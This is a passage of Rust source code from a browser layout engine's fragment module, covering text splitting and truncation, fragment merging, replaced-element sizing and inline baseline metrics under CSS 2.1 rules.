!node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { border_width.inline_end = Au(0); padding.inline_end = Au(0); margin.inline_end = Au(0); } result.surrounding_size = result.surrounding_size + border_width.inline_start_end() + padding.inline_start_end() + margin.inline_start_end(); } } result } /// Returns the narrowest inline-size that the first splittable part of this fragment could /// possibly be split to. (In most cases, this returns the inline-size of the first word in /// this fragment.) 
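    /// An illustrative sketch (hypothetical text run; `advance_of` is a stand-in
    /// helper, not a real API):
    /// ```ignore
    /// // For a scanned text fragment containing "hello world", the narrowest
    /// // splittable piece is the first word, so:
    /// assert_eq!(fragment.minimum_splittable_inline_size(), advance_of("hello"));
    /// ```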
pub fn minimum_splittable_inline_size(&self) -> Au { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text = t.text_info.as_ref().unwrap(); text.run.minimum_splittable_inline_size(&text.range) } SpecificFragmentInfo::ScannedText(ref text) => { text.run.minimum_splittable_inline_size(&text.range) } _ => Au(0), } } /// Returns the dimensions of the content box. /// /// This is marked `#[inline]` because it is frequently called when only one or two of the /// values are needed and that will save computation. #[inline] pub fn content_box(&self) -> LogicalRect<Au> { self.border_box - self.border_padding } /// Attempts to find the split positions of a text fragment so that its inline-size is no more /// than `max_inline_size`. /// /// A return value of `None` indicates that the fragment could not be split. Otherwise the /// information pertaining to the split is returned. The inline-start and inline-end split /// information are both optional due to the possibility of them being whitespace. pub fn calculate_split_position(&self, max_inline_size: Au, starts_line: bool) -> Option<SplitResult> { let text_fragment_info = match self.specific { SpecificFragmentInfo::ScannedText(ref text_fragment_info) => text_fragment_info, _ => return None, }; let mut flags = SplitOptions::empty(); if starts_line { flags.insert(SplitOptions::STARTS_LINE); if self.style().get_inheritedtext().overflow_wrap == overflow_wrap::T::break_word { flags.insert(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES) } } match self.style().get_inheritedtext().word_break { word_break::T::normal | word_break::T::keep_all => { // Break at normal word boundaries. keep-all forbids soft wrap opportunities. let natural_word_breaking_strategy = text_fragment_info.run.natural_word_slices_in_range(&text_fragment_info.range); self.calculate_split_position_using_breaking_strategy( natural_word_breaking_strategy, max_inline_size, flags) } word_break::T::break_all => { // Break at character boundaries. let character_breaking_strategy = text_fragment_info.run.character_slices_in_range(&text_fragment_info.range); flags.remove(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES); self.calculate_split_position_using_breaking_strategy( character_breaking_strategy, max_inline_size, flags) } } } /// Truncates this fragment to the given `max_inline_size`, using a character-based breaking /// strategy. The resulting fragment will have `SpecificFragmentInfo::TruncatedFragment`, /// preserving the original fragment for use in incremental reflow. /// /// This function will panic if self is already truncated. pub fn truncate_to_inline_size(self, max_inline_size: Au) -> Fragment { if let SpecificFragmentInfo::TruncatedFragment(_) = self.specific { panic!("Cannot truncate an already truncated fragment"); } let info = self.calculate_truncate_to_inline_size(max_inline_size); let (size, text_info) = match info { Some(TruncationResult { split: SplitInfo { inline_size, range }, text_run } ) => { let size = LogicalSize::new(self.style.writing_mode, inline_size, self.border_box.size.block); // Preserve the insertion point if it is in this fragment's range or it is at line end. 
let (flags, insertion_point) = match self.specific { SpecificFragmentInfo::ScannedText(ref info) => { match info.insertion_point { Some(index) if range.contains(index) => (info.flags, info.insertion_point), Some(index) if index == ByteIndex(text_run.text.chars().count() as isize - 1) && index == range.end() => (info.flags, info.insertion_point), _ => (info.flags, None) } }, _ => (ScannedTextFlags::empty(), None) }; let text_info = ScannedTextFragmentInfo::new( text_run, range, size, insertion_point, flags); (size, Some(text_info)) } None => (LogicalSize::zero(self.style.writing_mode), None) }; let mut result = self.transform(size, SpecificFragmentInfo::Generic); result.specific = SpecificFragmentInfo::TruncatedFragment(Box::new(TruncatedFragmentInfo { text_info: text_info, full: self, })); result } /// Truncates this fragment to the given `max_inline_size`, using a character-based breaking /// strategy. If no characters could fit, returns `None`. fn calculate_truncate_to_inline_size(&self, max_inline_size: Au) -> Option<TruncationResult> { let text_fragment_info = if let SpecificFragmentInfo::ScannedText(ref text_fragment_info) = self.specific { text_fragment_info } else { return None }; let character_breaking_strategy = text_fragment_info.run.character_slices_in_range(&text_fragment_info.range); match self.calculate_split_position_using_breaking_strategy(character_breaking_strategy, max_inline_size, SplitOptions::empty()) { None => None, Some(split_info) => { match split_info.inline_start { None => None, Some(split) => { Some(TruncationResult { split: split, text_run: split_info.text_run.clone(), }) } } } } } /// A helper method that uses the breaking strategy described by `slice_iterator` (at present, /// either natural word breaking or character breaking) to split this fragment. fn calculate_split_position_using_breaking_strategy<'a, I>( &self, slice_iterator: I, max_inline_size: Au, flags: SplitOptions) -> Option<SplitResult> where I: Iterator<Item=TextRunSlice<'a>> { let text_fragment_info = match self.specific { SpecificFragmentInfo::ScannedText(ref text_fragment_info) => text_fragment_info, _ => return None, }; let mut remaining_inline_size = max_inline_size - self.border_padding.inline_start_end(); let mut inline_start_range = Range::new(text_fragment_info.range.begin(), ByteIndex(0)); let mut inline_end_range = None; let mut overflowing = false; debug!("calculate_split_position_using_breaking_strategy: splitting text fragment \ (strlen={}, range={:?}, max_inline_size={:?})", text_fragment_info.run.text.len(), text_fragment_info.range, max_inline_size); for slice in slice_iterator { debug!("calculate_split_position_using_breaking_strategy: considering slice \ (offset={:?}, slice range={:?}, remaining_inline_size={:?})", slice.offset, slice.range, remaining_inline_size); // Use the `remaining_inline_size` to find a split point if possible. If not, go around // the loop again with the next slice. let metrics = text_fragment_info.run.metrics_for_slice(slice.glyphs, &slice.range); let advance = metrics.advance_width; // Have we found the split point? if advance <= remaining_inline_size || slice.glyphs.is_whitespace() { // Keep going; we haven't found the split point yet. debug!("calculate_split_position_using_breaking_strategy: enlarging span"); remaining_inline_size = remaining_inline_size - advance; inline_start_range.extend_by(slice.range.length()); continue } // The advance is more than the remaining inline-size, so split here. 
First, check to
            // see if we're going to overflow the line. If so, perform a best-effort split.
            let mut remaining_range = slice.text_run_range();
            let split_is_empty = inline_start_range.is_empty() &&
                !(self.requires_line_break_afterward_if_wrapping_on_newlines() &&
                  !self.white_space().allow_wrap());
            if split_is_empty {
                // We're going to overflow the line.
                overflowing = true;
                inline_start_range = slice.text_run_range();
                remaining_range = Range::new(slice.text_run_range().end(), ByteIndex(0));
                remaining_range.extend_to(text_fragment_info.range.end());
            }

            // Check to see if we need to create an inline-end chunk.
            let slice_begin = remaining_range.begin();
            if slice_begin < text_fragment_info.range.end() {
                // There are still some things left over at the end of the line, so create the
                // inline-end chunk.
                let mut inline_end = remaining_range;
                inline_end.extend_to(text_fragment_info.range.end());
                inline_end_range = Some(inline_end);
                debug!("calculate_split_position: splitting remainder with inline-end range={:?}",
                       inline_end);
            }

            // If we failed to find a suitable split point, we're on the verge of overflowing
            // the line.
            if split_is_empty || overflowing {
                // If we've been instructed to retry at character boundaries (probably via
                // `overflow-wrap: break-word`), do so.
                if flags.contains(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES) {
                    let character_breaking_strategy =
                        text_fragment_info.run
                                          .character_slices_in_range(&text_fragment_info.range);
                    let mut flags = flags;
                    flags.remove(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES);
                    return self.calculate_split_position_using_breaking_strategy(
                        character_breaking_strategy,
                        max_inline_size,
                        flags)
                }

                // We aren't at the start of the line, so don't overflow. Let inline layout
                // wrap to the next line instead.
                if !flags.contains(SplitOptions::STARTS_LINE) {
                    return None
                }
            }

            break
        }

        let split_is_empty = inline_start_range.is_empty() &&
            !self.requires_line_break_afterward_if_wrapping_on_newlines();
        let inline_start = if !split_is_empty {
            Some(SplitInfo::new(inline_start_range, &**text_fragment_info))
        } else {
            None
        };
        let inline_end = inline_end_range.map(|inline_end_range| {
            SplitInfo::new(inline_end_range, &**text_fragment_info)
        });

        Some(SplitResult {
            inline_start: inline_start,
            inline_end: inline_end,
            text_run: text_fragment_info.run.clone(),
        })
    }

    /// The opposite of `calculate_split_position_using_breaking_strategy`: merges this fragment
    /// with the next one.
    pub fn merge_with(&mut self, next_fragment: Fragment) {
        match (&mut self.specific, &next_fragment.specific) {
            (&mut SpecificFragmentInfo::ScannedText(ref mut this_info),
             &SpecificFragmentInfo::ScannedText(ref other_info)) => {
                debug_assert!(Arc::ptr_eq(&this_info.run, &other_info.run));
                this_info.range_end_including_stripped_whitespace =
                    other_info.range_end_including_stripped_whitespace;
                if other_info.requires_line_break_afterward_if_wrapping_on_newlines() {
                    this_info.flags.insert(
                        ScannedTextFlags::REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES);
                }
                if other_info.insertion_point.is_some() {
                    this_info.insertion_point = other_info.insertion_point;
                }
                self.border_padding.inline_end = next_fragment.border_padding.inline_end;
                self.margin.inline_end = next_fragment.margin.inline_end;
            }
            _ => panic!("Can only merge two scanned-text fragments!"),
        }
        self.reset_text_range_and_inline_size();
        self.meld_with_next_inline_fragment(&next_fragment);
    }

    /// Restore any whitespace that was stripped from a text fragment, and recompute inline
    /// metrics if necessary.
pub fn reset_text_range_and_inline_size(&mut self) { if let SpecificFragmentInfo::ScannedText(ref mut info) = self.specific { if info.run.extra_word_spacing != Au(0) { Arc::make_mut(&mut info.run).extra_word_spacing = Au(0); } // FIXME (mbrubeck): Do we need to restore leading too? let range_end = info.range_end_including_stripped_whitespace; if info.range.end() == range_end { return } info.range.extend_to(range_end); info.content_size.inline = info.run.metrics_for_range(&info.range).advance_width; self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } } /// Assigns replaced inline-size, padding, and margins for this fragment only if it is replaced /// content per CSS 2.1 § 10.3.2. pub fn assign_replaced_inline_size_if_necessary(&mut self, container_inline_size: Au, container_block_size: Option<Au>) { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_none() => return, SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn => return, SpecificFragmentInfo::TableColumn(_) => { panic!("Table column fragments do not have inline size") } SpecificFragmentInfo::UnscannedText(_) => { panic!("Unscanned text fragments should have been scanned by now!") } SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) => {} }; match self.specific { // Inline blocks SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); block_flow.base.position.size.inline = block_flow.base.intrinsic_inline_sizes.preferred_inline_size; // This is a hypothetical box, so it takes up no space. self.border_box.size.inline = Au(0); } SpecificFragmentInfo::InlineBlock(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); self.border_box.size.inline = max(block_flow.base.intrinsic_inline_sizes.minimum_inline_size, block_flow.base.intrinsic_inline_sizes.preferred_inline_size); block_flow.base.block_container_inline_size = self.border_box.size.inline; block_flow.base.block_container_writing_mode = self.style.writing_mode; } SpecificFragmentInfo::InlineAbsolute(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); self.border_box.size.inline = max(block_flow.base.intrinsic_inline_sizes.minimum_inline_size, block_flow.base.intrinsic_inline_sizes.preferred_inline_size); block_flow.base.block_container_inline_size = self.border_box.size.inline; block_flow.base.block_container_writing_mode = self.style.writing_mode; } // Text SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); // Scanned text fragments will have already had their content inline-sizes assigned // by this point. self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } SpecificFragmentInfo::ScannedText(ref info) => { // Scanned text fragments will have already had their content inline-sizes assigned // by this point. 
self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } // Replaced elements _ if self.is_replaced() => { let (inline_size, block_size) = self.calculate_replaced_sizes(Some(container_inline_size), container_block_size); self.border_box.size.inline = inline_size + self.border_padding.inline_start_end(); self.border_box.size.block = block_size + self.border_padding.block_start_end(); } ref unhandled @ _ => panic!("this case should have been handled above: {:?}", unhandled), } } /// Assign block-size for this fragment if it is replaced content. The inline-size must have /// been assigned first. /// /// Ideally, this should follow CSS 2.1 § 10.6.2. pub fn assign_replaced_block_size_if_necessary(&mut self) { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_none() => return, SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn => return, SpecificFragmentInfo::TableColumn(_) => { panic!("Table column fragments do not have block size") } SpecificFragmentInfo::UnscannedText(_) => { panic!("Unscanned text fragments should have been scanned by now!") } SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) => {} } match self.specific { // Text SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); // Scanned text fragments' content block-sizes are calculated by the text run // scanner during flow construction. self.border_box.size.block = info.content_size.block + self.border_padding.block_start_end(); } SpecificFragmentInfo::ScannedText(ref info) => { // Scanned text fragments' content block-sizes are calculated by the text run // scanner during flow construction. self.border_box.size.block = info.content_size.block + self.border_padding.block_start_end(); } // Inline blocks SpecificFragmentInfo::InlineBlock(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block + block_flow.fragment.margin.block_start_end() } SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block; } SpecificFragmentInfo::InlineAbsolute(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block + block_flow.fragment.margin.block_start_end() } // Replaced elements _ if self.is_replaced() => {}, ref unhandled @ _ => panic!("should have been handled above: {:?}", unhandled), } } /// Returns true if this fragment is replaced content. 
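    /// A hedged sketch of the classification below (fragment values are illustrative):
    /// ```ignore
    /// // Images, canvases, iframes, and SVG fragments are replaced content;
    /// // text and generic fragments are not.
    /// assert!(image_fragment.is_replaced());
    /// assert!(!scanned_text_fragment.is_replaced());
    /// ```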
pub fn is_replaced(&self) -> bool { match self.specific { SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Svg(_) => true, _ => false } } /// Returns true if this fragment is replaced content or an inline-block or false otherwise. pub fn is_replaced_or_inline_block(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) => true, _ => self.is_replaced(), } } /// Calculates block-size above baseline, depth below baseline, and ascent for this fragment /// when used in an inline formatting context. See CSS 2.1 § 10.8.1. /// /// This does not take `vertical-align` into account. For that, use `aligned_inline_metrics()`. fn content_inline_metrics(&self, layout_context: &LayoutContext) -> InlineMetrics { // CSS 2.1 § 10.8: "The height of each inline-level box in the line box is // calculated. For replaced elements, inline-block elements, and inline-table // elements, this is the height of their margin box." // // FIXME(pcwalton): We have to handle `Generic` and `GeneratedContent` here to avoid // crashing in a couple of `css21_dev/html4/content-` WPTs, but I don't see how those two // fragment types should end up inside inlines. (In the case of `GeneratedContent`, those // fragment types should have been resolved by now…) let inline_metrics = match self.specific { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) => { let ascent = self.border_box.size.block + self.margin.block_end; InlineMetrics { space_above_baseline: ascent + self.margin.block_start, space_below_baseline: Au(0), ascent: ascent, } } SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); inline_metrics_of_text(info, self, layout_context) } SpecificFragmentInfo::ScannedText(ref info) => { inline_metrics_of_text(info, self, layout_context) } SpecificFragmentInfo::InlineBlock(ref info) => { inline_metrics_of_block(&info.flow_ref, &*self.style) } SpecificFragmentInfo::InlineAbsoluteHypothetical(ref info) => { inline_metrics_of_block(&info.flow_ref, &*self.style) } SpecificFragmentInfo::TruncatedFragment(..) | SpecificFragmentInfo::InlineAbsolute(_) => { InlineMetrics::new(Au(0), Au(0), Au(0)) } SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::UnscannedText(_) => { unreachable!("Shouldn't see fragments of this type here!") } }; return inline_metrics; fn inline_metrics_of_text(info: &ScannedTextFragmentInfo, self_: &Fragment, layout_context: &LayoutContext) -> InlineMetrics { // Fragments with no glyphs don't contribute any inline metrics. // TODO: Filter out these fragments during flow construction? if info.insertion_point.is_none() && info.content_size.inline == Au(0) { return InlineMetrics::new(Au(0), Au(0), Au(0)); } // See CSS 2.1 § 10.8.1. 
let font_metrics = with_thread_local_font_context(layout_context, |font_context| { text::font_metrics_for_style(font_context, self_.style.clone_font()) }); let line_height = text::line_height_from_style(&*self_.style, &font_metrics); InlineMetrics::from_font_metrics(&info.run.font_metrics, line_height) } fn inline_metrics_of_block(flow: &FlowRef, style: &ComputedValues) -> InlineMetrics { // CSS 2.1 § 10.8: "The height of each inline-level box in the line box is calculated. // For replaced elements, inline-block elements, and inline-table elements, this is the // height of their margin box." // // CSS 2.1 § 10.8.1: "The baseline of an 'inline-block' is the baseline of its last // line box in the normal flow, unless it has either no in-flow line boxes or if its // 'overflow' property has a computed value other than 'visible', in which case the // baseline is the bottom margin edge." // // NB: We must use `block_flow.fragment.border_box.size.block` here instead of // `block_flow.base.position.size.block` because sometimes the latter is late-computed // and isn't up to date at this point. let block_flow = flow.as_block(); let start_margin = block_flow.fragment.margin.block_start; let end_margin = block_flow.fragment.margin.block_end; let border_box_block_size = block_flow.fragment.border_box.size.block; // -------- // margin // top -------- + + // | | // | | // A ..pogo.. | + baseline_offset_of_last_line_box_in_flow() // | // -------- + border_box_block_size // margin // B -------- // // § 10.8.1 says that the baseline (and thus ascent, which is the // distance from the baseline to the top) should be A if it has an // in-flow line box and if overflow: visible, and B otherwise. let ascent = match (flow.baseline_offset_of_last_line_box_in_flow(), style.get_box().overflow_y) { // Case A (Some(baseline_offset), overflow_x::T::visible) => baseline_offset, // Case B _ => border_box_block_size + end_margin, }; let space_below_baseline = border_box_block_size + end_margin - ascent; let space_above_baseline = ascent + start_margin; InlineMetrics::new(space_above_baseline, space_below_baseline, ascent) } } /// Calculates the offset from the baseline that applies to this fragment due to /// `vertical-align`. Positive values represent downward displacement. /// /// If `actual_line_metrics` is supplied, then these metrics are used to determine the /// displacement of the fragment when `top` or `bottom` `vertical-align` values are /// encountered. If this is not supplied, then `top` and `bottom` values are ignored. fn vertical_alignment_offset(&self, layout_context: &LayoutContext, content_inline_metrics: &InlineMetrics, minimum_line_metrics: &LineMetrics, actual_line_metrics: Option<&LineMetrics>) -> Au { let mut offset = Au(0); for style in self.inline_styles() { // If any of the inline styles say `top` or `bottom`, adjust the vertical align // appropriately. // // FIXME(#5624, pcwalton): This passes our current reftests but isn't the right thing // to do. 
match style.get_box().vertical_align { VerticalAlign::Baseline => {} VerticalAlign::Middle => { let font_metrics = with_thread_local_font_context(layout_context, |font_context| { text::font_metrics_for_style(font_context, self.style.clone_font()) }); offset += (content_inline_metrics.ascent - content_inline_metrics.space_below_baseline - font_metrics.x_height).scale_by(0.5) } VerticalAlign::Sub => { offset += minimum_line_metrics.space_needed() .scale_by(FONT_SUBSCRIPT_OFFSET_RATIO) } VerticalAlign::Super => { offset -= minimum_line_metrics.space_needed() .scale_by(FONT_SUPERSCRIPT_OFFSET_RATIO) } VerticalAlign::TextTop => { offset = self.content_inline_metrics(layout_context).ascent - minimum_line_metrics.space_above_baseline } VerticalAlign::TextBottom => { offset = minimum_line_metrics.space_below_baseline - self.content_inline_metrics(layout_context).space_below_baseline } VerticalAlign::Top => { if let Some(actual_line_metrics) = actual_line_metrics { offset = content_inline_metrics.ascent - actual_line_metrics.space_above_baseline } } VerticalAlign::Bottom => { if let Some(actual_line_metrics) = actual_line_metrics { offset = actual_line_metrics.space_below_baseline - content_inline_metrics.space_below_baseline } } VerticalAlign::Length(LengthOrPercentage::Length(length)) => { offset -= Au::from(length) } VerticalAlign::Length(LengthOrPercentage::Percentage(percentage)) => { offset -= minimum_line_metrics.space_needed().scale_by(percentage.0) } VerticalAlign::Length(LengthOrPercentage::Calc(formula)) => { offset -= formula.to_used_value(Some(minimum_line_metrics.space_needed())).unwrap() } } } offset } /// Calculates block-size above baseline, depth below baseline, and ascent for this fragment /// when used in an inline formatting context, taking `vertical-align` (other than `top` or /// `bottom`) into account. See CSS 2.1 § 10.8.1. /// /// If `actual_line_metrics` is supplied, then these metrics are used to determine the /// displacement of the fragment when `top` or `bottom` `vertical-align` values are /// encountered. If this is not supplied, then `top` and `bottom` values are ignored. pub fn aligned_inline_metrics(&self, layout_context: &LayoutContext, minimum_line_metrics: &LineMetrics, actual_line_metrics: Option<&LineMetrics>) -> InlineMetrics { let content_inline_metrics = self.content_inline_metrics(layout_context); let vertical_alignment_offset = self.vertical_alignment_offset(layout_context, &content_inline_metrics, minimum_line_metrics, actual_line_metrics); let mut space_above_baseline = match actual_line_metrics { None => content_inline_metrics.space_above_baseline, Some(actual_line_metrics) => actual_line_metrics.space_above_baseline, }; space_above_baseline = space_above_baseline - vertical_alignment_offset; let space_below_baseline = content_inline_metrics.space_below_baseline + vertical_alignment_offset; let ascent = content_inline_metrics.ascent - vertical_alignment_offset; InlineMetrics::new(space_above_baseline, space_below_baseline, ascent) } /// Returns true if this fragment is a hypothetical box. See CSS 2.1 § 10.3.7. pub fn is_hypothetical(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => true, _ => false, } } /// Returns true if this fragment can merge with another immediately-following fragment or /// false otherwise. 
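    /// A hedged sketch of the intent (names are illustrative):
    /// ```ignore
    /// // Two adjacent unscanned text fragments with the same font, color,
    /// // `white-space`, and `text-decoration-line`, and with no intervening
    /// // border, padding, or margin from their inline ancestors, can be merged
    /// // and scanned as a single text run:
    /// if first.can_merge_with_fragment(&second) {
    ///     // ... coalesce `second` into `first` before text scanning.
    /// }
    /// ```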
pub fn can_merge_with_fragment(&self, other: &Fragment) -> bool { match (&self.specific, &other.specific) { (&SpecificFragmentInfo::UnscannedText(ref first_unscanned_text), &SpecificFragmentInfo::UnscannedText(_)) => { // FIXME: Should probably use a whitelist of styles that can safely differ (#3165) if self.style().get_font() != other.style().get_font() || self.text_decoration_line() != other.text_decoration_line() || self.white_space() != other.white_space() || self.color() != other.color() { return false } if first_unscanned_text.text.ends_with('\n') { return false } // If this node has any styles that have border/padding/margins on the following // side, then we can't merge with the next fragment. if let Some(ref inline_context) = self.inline_context { for inline_context_node in inline_context.nodes.iter() { if !inline_context_node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node.style.logical_margin().inline_end != LengthOrPercentageOrAuto::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_padding().inline_end != LengthOrPercentage::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_border_width().inline_end != Au(0) { return false } } } // If the next fragment has any styles that have border/padding/margins on the // preceding side, then it can't merge with us. if let Some(ref inline_context) = other.inline_context { for inline_context_node in inline_context.nodes.iter() { if !inline_context_node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node.style.logical_margin().inline_start != LengthOrPercentageOrAuto::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_padding().inline_start != LengthOrPercentage::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_border_width().inline_start != Au(0) { return false } } } true } _ => false, } } /// Returns true if and only if this is the *primary fragment* for the fragment's style object /// (conceptually, though style sharing makes this not really true, of course). The primary /// fragment is the one that draws backgrounds, borders, etc., and takes borders, padding and /// margins into account. Every style object has at most one primary fragment. /// /// At present, all fragments are primary fragments except for inline-block and table wrapper /// fragments. Inline-block fragments are not primary fragments because the corresponding block /// flow is the primary fragment, while table wrapper fragments are not primary fragments /// because the corresponding table flow is the primary fragment. pub fn is_primary_fragment(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::TableWrapper => false, SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::UnscannedText(_) => true, } } /// Determines the inline sizes of inline-block fragments. 
These cannot be fully computed until /// inline size assignment has run for the child flow: thus it is computed "late", during /// block size assignment. pub fn update_late_computed_replaced_inline_size_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineBlock(ref mut inline_block_info) = self.specific { let block_flow = FlowRef::deref_mut(&mut inline_block_info.flow_ref).as_block(); self.border_box.size.inline = block_flow.fragment.margin_box_inline_size(); } } pub fn update_late_computed_inline_position_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) = self.specific { let position = self.border_box.start.i; FlowRef::deref_mut(&mut info.flow_ref) .update_late_computed_inline_position_if_necessary(position) } } pub fn update_late_computed_block_position_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) = self.specific { let position = self.border_box.start.b; FlowRef::deref_mut(&mut info.flow_ref) .update_late_computed_block_position_if_necessary(position) } } pub fn repair_style(&mut self, new_style: &ServoArc<ComputedValues>) { self.style = (*new_style).clone() } /// Given the stacking-context-relative position of the containing flow, returns the border box /// of this fragment relative to the parent stacking context. This takes `position: relative` /// into account. /// /// If `coordinate_system` is `Parent`, this returns the border box in the parent stacking /// context's coordinate system. Otherwise, if `coordinate_system` is `Own` and this fragment /// establishes a stacking context itself, this returns a border box anchored at (0, 0). (If /// this fragment does not establish a stacking context, then it always belongs to its parent /// stacking context and thus `coordinate_system` is ignored.) /// /// This is the method you should use for display list construction as well as /// `getBoundingClientRect()` and so forth. pub fn stacking_relative_border_box(&self, stacking_relative_flow_origin: &Vector2D<Au>, relative_containing_block_size: &LogicalSize<Au>, relative_containing_block_mode: WritingMode, coordinate_system: CoordinateSystem) -> Rect<Au> { let container_size = relative_containing_block_size.to_physical(relative_containing_block_mode); let border_box = self.border_box.to_physical(self.style.writing_mode, container_size); if coordinate_system == CoordinateSystem::Own && self.establishes_stacking_context() { return Rect::new(Point2D::zero(), border_box.size) } // FIXME(pcwalton): This can double-count relative position sometimes for inlines (e.g. // `<div style="position:relative">x</div>`, because the `position:relative` trickles down // to the inline flow. Possibly we should extend the notion of "primary fragment" to fix // this. let relative_position = self.relative_position(relative_containing_block_size); border_box.translate_by_size(&relative_position.to_physical(self.style.writing_mode)) .translate(&stacking_relative_flow_origin) } /// Given the stacking-context-relative border box, returns the stacking-context-relative /// content box. 
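    /// A worked sketch of the arithmetic below, in physical coordinates
    /// (illustrative numbers):
    /// ```ignore
    /// // Border box at (10, 10) with size 100x50; border+padding of
    /// // left 4, right 4, top 2, bottom 2 yields a content box at
    /// // (14, 12) with size 92x46.
    /// let content_box = fragment.stacking_relative_content_box(&border_box);
    /// ```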
